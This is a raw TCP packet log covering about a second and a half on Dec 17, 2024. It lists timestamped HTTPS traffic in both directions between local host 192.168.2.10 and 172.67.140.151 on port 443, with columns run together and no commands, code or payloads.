                                                                                    Dec 17, 2024 08:38:28.419887066 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.420149088 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.427369118 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.427411079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.427531958 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.427540064 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.427607059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.435154915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.435173988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.435282946 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.435295105 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.435533047 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.442266941 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.442287922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.442434072 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.442440987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.442533970 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.449008942 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.449028969 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.449151993 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.449161053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.449299097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.456836939 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.456856966 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.457037926 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.457046032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.457119942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.465010881 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.465046883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.465089083 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.465118885 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.465147018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.465147018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.605053902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.605088949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.606292963 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.606311083 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.607336998 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.611804962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.611830950 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.611991882 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.611991882 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.612003088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.612122059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.619540930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.619560957 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.619687080 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.619703054 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.621756077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.627679110 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.627700090 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.627794981 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.627794981 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.627804995 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.627847910 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.635479927 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.635499001 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.635620117 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.635637045 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.635729074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.642342091 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.642365932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.642420053 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.642431021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.642477036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.642477036 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.648962021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.648984909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.649136066 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.649147034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.649184942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.658644915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.658663988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.658752918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.658766985 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.658814907 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.797204018 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.797285080 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.797404051 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.797405005 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.797419071 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.797485113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.804891109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.804951906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.805035114 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.805046082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.805063009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.805100918 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.811826944 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.811894894 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.811980009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.811980009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.811996937 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.812205076 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.819178104 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.819202900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.819336891 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.819344997 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.819464922 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.826754093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.826781034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.826842070 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.826853991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.826893091 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.826920986 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.834120035 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.834146023 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.834208965 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.834220886 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.834245920 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.834307909 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.841873884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.841895103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.841989040 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.841996908 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.842067957 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.842103004 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.848680973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.848726988 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.848772049 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.848781109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.848819971 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.848833084 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.989545107 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.989605904 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.989643097 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.989655972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.989718914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.996172905 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.996220112 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.996244907 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:28.996257067 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:28.996313095 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.001669884 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.001730919 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.001746893 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.001758099 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.001804113 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.009391069 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.009418011 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.009469032 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.009479046 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.009525061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.016082048 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.016112089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.016186953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.016195059 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.016231060 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.024270058 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.024307013 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.024384022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.024393082 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.024410009 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.031035900 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.031064987 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.031122923 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.031136036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.031250954 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.038696051 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.038721085 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.038815022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.038829088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.038877010 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.178985119 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.179056883 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.179110050 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.179122925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.179157019 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.186726093 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.186748028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.186789036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.186805010 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.186808109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.186846972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.186888933 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.193378925 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.193420887 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.193444967 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.193458080 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.193468094 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.193495035 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.193522930 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.193540096 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.201045036 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.201066971 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.201108932 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.201122999 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.201189041 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.201196909 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.208709955 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.208765030 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.208899975 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.208915949 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.208940983 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.216003895 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.216048956 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.216103077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.216120005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.216159105 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.223644972 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.223704100 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.223776102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.223776102 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.223788023 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.230386019 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.230429888 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.230494022 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.230505943 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.230516911 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.298835039 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.370873928 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.370889902 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.370939016 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.370968103 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.370966911 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.371014118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.371014118 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.371030092 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.371066093 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.379396915 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.379420996 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.379487991 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.379503012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.379545927 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.386286020 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.386348963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.386425018 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.386439085 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.386461973 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.386514902 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.393119097 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.393167973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.393220901 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.393233061 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.393287897 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.393289089 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.400758028 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.400803089 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.401000023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.401000023 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.401011944 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.401094913 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.408058882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.408111095 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.408157110 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.408174038 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.408232927 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.408233881 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.415668964 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.415718079 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.415775061 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.415788889 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.415833950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.415833950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.423332930 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.423360109 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.423451900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.423451900 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.423464060 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.423610926 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.563241005 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.563307047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.563334942 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.563349962 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.563388109 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.563409090 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.570745945 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.570791960 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.570836067 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.570847034 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.570882082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.570907116 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.578546047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.578589916 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.578638077 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.578656912 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.578690052 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.578713894 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.585223913 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.585272074 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.585366011 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.585366011 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.585381985 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.585437059 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.592946053 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.592992067 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.593038082 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.593053102 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.593108892 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.593108892 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.600157976 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.600204945 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.600245953 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.600260973 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.600300074 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.600462914 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.607785940 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.607842922 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.607928038 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.607928038 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.607944012 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.608001947 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.615554094 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.615597963 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.615643978 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.615658998 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.615680933 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.615724087 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.755161047 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.755191088 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.755237103 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.755247116 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.755323887 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.755323887 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.762816906 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.762871981 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.762892962 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.762904882 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.762939930 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.762954950 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.770498991 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.770529032 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.770581007 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.770591021 CET44349713172.67.140.151192.168.2.10
                                                                                    Dec 17, 2024 08:38:29.770632029 CET49713443192.168.2.10172.67.140.151
                                                                                    Dec 17, 2024 08:38:29.770726919 CET49713443192.168.2.10172.67.140.151
